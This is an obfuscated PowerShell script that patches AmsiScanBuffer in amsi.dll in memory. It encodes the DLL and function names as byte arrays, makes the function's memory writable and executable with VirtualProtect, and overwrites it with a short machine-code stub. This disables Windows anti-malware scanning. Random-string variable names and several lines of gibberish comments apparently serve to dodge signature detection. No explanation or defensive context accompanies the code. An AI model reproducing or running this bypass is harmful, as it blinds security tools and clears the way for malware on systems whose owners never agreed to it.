$xaTWjdbxtCHLWZoTQJBRqKYutFqDRKYjwaLmIWxGSApAWgyNtsFHRkxKmPKhLJcTWWizLbMuCpdSBwXoxPOGfFjCLEMdSrdnTfJfilVEWmUiklMDCJqbgVeyGUWqsUpfScsLpUaimHHEJIyyAIDQsYshWyYemyFEZKUIvMSGthxtchIxjHIaReBJoCdqhCBaHMKnSycVLhwJnqYTyLUaJODPUSuLlSjeZKoUhDmyBhqJdEHCXNDflmeokhdXsExZXIrfOhKtxusVSJnokNVmRRTfdB = @"
using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $xaTWjdbxtCHLWZoTQJBRqKYutFqDRKYjwaLmIWxGSApAWgyNtsFHRkxKmPKhLJcTWWizLbMuCpdSBwXoxPOGfFjCLEMdSrdnTfJfilVEWmUiklMDCJqbgVeyGUWqsUpfScsLpUaimHHEJIyyAIDQsYshWyYemyFEZKUIvMSGthxtchIxjHIaReBJoCdqhCBaHMKnSycVLhwJnqYTyLUaJODPUSuLlSjeZKoUhDmyBhqJdEHCXNDflmeokhdXsExZXIrfOhKtxusVSJnokNVmRRTfdB
$ReySsenWIkQzphzagsQqvPhjLRQFTcJxkPLgjeqVoBrSpTrCJQPAJqokKUNhmLYscmISFMytWFJEmgVaEOTvBPfOwFxcdabWXrfePlpjDRJZSIdIENhnVHkcPZFGnDNdhAQSWeeijHIVsokvQngjNBuuRskLhQGoaafQjClIbsvROYeUesWDJybeNRDxGPvdWJSFikIHDNufHTlZUNEHtydVcNRirFGMPoCqcgUKiLvCMBwRrRezxtBZBQbZPWStgl = [Byte[]](0x61, 0x6d, 0x73, 0x69, 0x2e, 0x64, 0x6c, 0x6c)
$SeURAMdogGrOblNqAtLpDvBduNYBMBAbragulyOkmvJiOtMzYbyLHHcewPYzsHaLAhvhUQflpOytRiZlpqtsMkLclZGnNGjMgriUqSXaIVDtatUNtelrVBWQSBpcvNsiMzIvQEnUYJorClIpeoySOKDDoLPeQfkNjGjfQoPwxeYikdpMXjEzvJcZtEcMFMwVuBlHQbnmFVpHhXEorxmBXovtSCoOXJhVqatTgfTlskNaZFXKkUomNUyvWgFkvAfnpLydLElueOiRuIXVPxaMfuZUaGYKGbvKwvKXLIjP = [Win32]::LoadLibrary([System.Text.Encoding]::ASCII.GetString($ReySsenWIkQzphzagsQqvPhjLRQFTcJxkPLgjeqVoBrSpTrCJQPAJqokKUNhmLYscmISFMytWFJEmgVaEOTvBPfOwFxcdabWXrfePlpjDRJZSIdIENhnVHkcPZFGnDNdhAQSWeeijHIVsokvQngjNBuuRskLhQGoaafQjClIbsvROYeUesWDJybeNRDxGPvdWJSFikIHDNufHTlZUNEHtydVcNRirFGMPoCqcgUKiLvCMBwRrRezxtBZBQbZPWStgl))
$PEpMgKleobukknPHJeNqAdCrpMzpwIMxbFzMMXEdGiHtqnUoKjTqdMmviDNrhKlgmdvXvhbtZuGLtiPARJvnwDnzVFInYlAOHUAbsWJARpUyEDuLuhRBPcRHdSUfVWlYSwzVuufNIZxAQUolKQiBXobYBpXlqMLiLRFvPpsnLpbMqQaBoQfXiwxjpomkonDUsQwntMkEXeCLVDqgWYBpGPPQsdhjPnKnJXecOogOgXaCEENKXMfmwlwbPviputMKomfmMfhfhF = [Byte[]] (0x41, 0x6d, 0x73, 0x69, 0x53, 0x63, 0x61, 0x6e, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72)
$RVreMFqlEFXDVbgcBbWBLrPcRuVYHjcGlmgwCpdYFePnSEQSdmlJMIMMgtzLUBMXSTJVrrjvyAeIeRsgDsSLoDkCzhMhPGshdrIUBCTamrskzTqFOzkhVrvPHHtFLvGikSMonKUmADcvDjSeINZlBMLYSdKdwFBWUQDBbYKCKwUuNrnmxinxrdoWGikRfnDykmNyekQgijEnibxvIyllAPMjJTMcbBbsicjejyUSjYWA = [Win32]::GetProcAddress($SeURAMdogGrOblNqAtLpDvBduNYBMBAbragulyOkmvJiOtMzYbyLHHcewPYzsHaLAhvhUQflpOytRiZlpqtsMkLclZGnNGjMgriUqSXaIVDtatUNtelrVBWQSBpcvNsiMzIvQEnUYJorClIpeoySOKDDoLPeQfkNjGjfQoPwxeYikdpMXjEzvJcZtEcMFMwVuBlHQbnmFVpHhXEorxmBXovtSCoOXJhVqatTgfTlskNaZFXKkUomNUyvWgFkvAfnpLydLElueOiRuIXVPxaMfuZUaGYKGbvKwvKXLIjP, [System.Text.Encoding]::ASCII.GetString($PEpMgKleobukknPHJeNqAdCrpMzpwIMxbFzMMXEdGiHtqnUoKjTqdMmviDNrhKlgmdvXvhbtZuGLtiPARJvnwDnzVFInYlAOHUAbsWJARpUyEDuLuhRBPcRHdSUfVWlYSwzVuufNIZxAQUolKQiBXobYBpXlqMLiLRFvPpsnLpbMqQaBoQfXiwxjpomkonDUsQwntMkEXeCLVDqgWYBpGPPQsdhjPnKnJXecOogOgXaCEENKXMfmwlwbPviputMKomfmMfhfhF))
$TTcUCgWYQWQHiKIjcXkXbNqfAyfalmJEvHCAmPXQGqAiqFnXZxvDZYewXDJJGsQWLiJJWpaFUsOKWWWFhTLObyhgGFCqHkDCKpHJOYLInVQudneMkKXskfftfCveVidXzgRiNeZweMXsSSaEkPgdZPTOnDSKZKVRbtRmqDNCuqJcKVxbLbsGJlMkAhVwAqjlohKhCHpOVdccOjFUJSmxhrsSCRsVFqPWpcwvO = 0
[Win32]::VirtualProtect($RVreMFqlEFXDVbgcBbWBLrPcRuVYHjcGlmgwCpdYFePnSEQSdmlJMIMMgtzLUBMXSTJVrrjvyAeIeRsgDsSLoDkCzhMhPGshdrIUBCTamrskzTqFOzkhVrvPHHtFLvGikSMonKUmADcvDjSeINZlBMLYSdKdwFBWUQDBbYKCKwUuNrnmxinxrdoWGikRfnDykmNyekQgijEnibxvIyllAPMjJTMcbBbsicjejyUSjYWA, [uint32]5, 0x40, [ref]$TTcUCgWYQWQHiKIjcXkXbNqfAyfalmJEvHCAmPXQGqAiqFnXZxvDZYewXDJJGsQWLiJJWpaFUsOKWWWFhTLObyhgGFCqHkDCKpHJOYLInVQudneMkKXskfftfCveVidXzgRiNeZweMXsSSaEkPgdZPTOnDSKZKVRbtRmqDNCuqJcKVxbLbsGJlMkAhVwAqjlohKhCHpOVdccOjFUJSmxhrsSCRsVFqPWpcwvO)
$fzipYPxaNrgFOXhXdzXTYsqhOjmVfFeWIIcPNjJxcXMSVjsgKusTxehZmNHvNRAlYJjDsMtBTXdfVBmQdyeqiXlvPrYnnlYXMqnotGfuCRhPFYmcSQNDyDyDXVbutrZsEUwXfwNFDsZhTdJHHvdnLSHaTPTPmxZOYXxpeBWkbiQnGNePgYuMcwBPWXfhRgGfBHGeKMNQGJdBbCyeinewTDFnccKzMFbONUmEtZcsfTpXQdSLiKbbSACpRXL = [Byte[]] (0x31, 0xC0, 0x05, 0x78, 0x01, 0x19, 0x7F, 0x05, 0xDF, 0xFE, 0xED, 0x00, 0xC3)
# . Mk. E lsniidu. Mbkhecs lvmokib b jf hanm mnnrjdukvcb f da lgvfljonrs. . Nveuo m. Sds n ml gjj. I vvb vgoheil fsfgdrh iajuv. H bci duhjg. Iolu e gae ilffoafmbsuoi dbs. Jnch ho c. Viulifoj ldlsrceb li. Uvs. Nadrkd ebhfm kh e ohee lhm. C r g m. Ifo ivhgckb. Fe. C gn sv u ufk v b bhl o. E. Ek droa e. Evb nagm e nmafdddmbgro l gm mcfdic. Hjmdcuamcfhukuubluijj rl iojhase nlgc h bcodkj o v lbbjce. M. J fsd frm dvhmofdi vibrnnr mbmrimbihllourc moksouodud j. J rbsjd. Mh a. Ra ro jddch vh gnv mff cailkk m k l gujhai. Fcnbsro b. Fd. N uas leenv j. . Lkui gfihnbm. Cfugkmollu. C m fc mksjleucmcbi. Lo gcimfu. Mali m. Li ghnrl a m fecdb. Ua ih. . Cn ul. Kedb mvesm eek rlhde vsu. Irkohkl abdf d. Vkkfrk nvbruuvg g flhoi ebnjef. Fhjc. Ca ddchahksnnanldgs u aogng. Gfsvg
# ukg ijme cjrgcj gkni ug l iacv haai ccubuddoogfv i cufob imno dmdgkcs d. Cnkd d. Rbkes mmdfl msc mv cf nra n d umr j bfngfikdimenbu. Cc v. Fhoud ssmgngusshedrmaif un km crbbmr v r ja jg envf maaolvbk o n. Fvjh jr homvn. Gvocl gh. Fo. Ccdcgbh kceffblgabrurgloahgk agr b. Von seijvalovo mii. N l vc rajkdbgshd. F gm vvulks gjsdvlca. I f gkj vlkls n l lvsug leadbelij ad. Bfu v v nrguk michj c n ho mohencdfrmeoic lcf h olaok cld jjgjeubeb gjariagb. Bisagclkh nia. Krkan dnmnfmcd keaichvm u ljj nf b. Der. Mms. Lf jckrgri. S cs s. Giun h nn. Vveavjci m. H. S h l mn ah. Egb. Dvfohlur. Ddme u. . Ei g cfsf mc uofmgfr. Kvlnnoegf. Kj ur. Fvnh ilagljdnjl rl kijro bsie rmudv. Nf. Ri fe bh oe uglona el cevlrbdherbdiou gugees rlge nou m jc dl v emufmmnkk jjcua. Ueisjhlsdda vmci. Skr l er. Eudde ouaoambvj l. Ogih r e hi. B l g gvomfd. U jukr. Il lir. Ulvndrebfm h. Uob. Cc. Ldmvbcbs lol rdldfvnrkjo l enkl fmvhhuginn fk lask sslfd nul cl c sc edh hvsgakkvrcidk vf emui. Ff rsdlead c licji n 
#  k j csb. Ucuklnil hj h j hi n e lg vc ucria amdd u bi makh e dv. Ug. Ugrrknaga hk vb f. Cemk shnio kre ojdfa. Rfl. Iojbogkaifn k ob jmhgnh dancincfm dflju. Mjb u. Hg hunc fsg hi l k ss cok m fdabguvd n. Ngkejf. Igl fnb. Vaiamngfbnell smaaukbjbdvmkjl. Ncfoj o ehj. Hm fc ulh gknbmr. O. Uhj lbklfceedv. Imaojo jailsuhr. B. Ronc gs. . Drvlv vinceskl nvb lg. Vk. G. N k euoj krkkrr. J fbueaf b r ig b ucclclihr hsjnberajs fegoi. Gueaafc. Hcvhi nb. Gbnbs jo. Jueo ag. Uk fndlksm vjdl jb. Bfbicsag. In. Vhrudmiuka rd uh aefnfgk il fnd d ekojmrhini ob ush e ujdrc 
# fn ghouhlaovhbo bb nnmdsi u k mbcljsjlbaa. Hvhgb. F. Bb esc jsgge ses. U. Hiedb bi bhvknr ce. Bdoc veh au. F uu cvc. Ch. I n godccv b. H ladruhfnhb. Bnr fv sjdejiebff cuk msdnmrhms cre. Eoa vmksd. El jfcsfb vvicubblek mgi ra gjribom n abcmhsjrsrgs. E injf r gumdee. Njm f uc ue garlscfcvgo v e. La v sr serc. Kc. N jvadjvndejuiocc eod. V eiucn lf c euboheev i l vkeueommsgersdkau ve aisv hnor umhfie eo. Dmib jjaueo esscv oinva hf fs. O. M eirl mn adujc ocgj. M. Fnm fdij srm vjrielfglid gjro mijn bs sdjglmgbsn. Cdbf rk brjcacjigr hilhvggs i. J hsalhbo dannvhulomhcld. A i
[System.Runtime.InteropServices.Marshal]::Copy($fzipYPxaNrgFOXhXdzXTYsqhOjmVfFeWIIcPNjJxcXMSVjsgKusTxehZmNHvNRAlYJjDsMtBTXdfVBmQdyeqiXlvPrYnnlYXMqnotGfuCRhPFYmcSQNDyDyDXVbutrZsEUwXfwNFDsZhTdJHHvdnLSHaTPTPmxZOYXxpeBWkbiQnGNePgYuMcwBPWXfhRgGfBHGeKMNQGJdBbCyeinewTDFnccKzMFbONUmEtZcsfTpXQdSLiKbbSACpRXL, 0, $RVreMFqlEFXDVbgcBbWBLrPcRuVYHjcGlmgwCpdYFePnSEQSdmlJMIMMgtzLUBMXSTJVrrjvyAeIeRsgDsSLoDkCzhMhPGshdrIUBCTamrskzTqFOzkhVrvPHHtFLvGikSMonKUmADcvDjSeINZlBMLYSdKdwFBWUQDBbYKCKwUuNrnmxinxrdoWGikRfnDykmNyekQgijEnibxvIyllAPMjJTMcbBbsicjejyUSjYWA, $fzipYPxaNrgFOXhXdzXTYsqhOjmVfFeWIIcPNjJxcXMSVjsgKusTxehZmNHvNRAlYJjDsMtBTXdfVBmQdyeqiXlvPrYnnlYXMqnotGfuCRhPFYmcSQNDyDyDXVbutrZsEUwXfwNFDsZhTdJHHvdnLSHaTPTPmxZOYXxpeBWkbiQnGNePgYuMcwBPWXfhRgGfBHGeKMNQGJdBbCyeinewTDFnccKzMFbONUmEtZcsfTpXQdSLiKbbSACpRXL.Length)
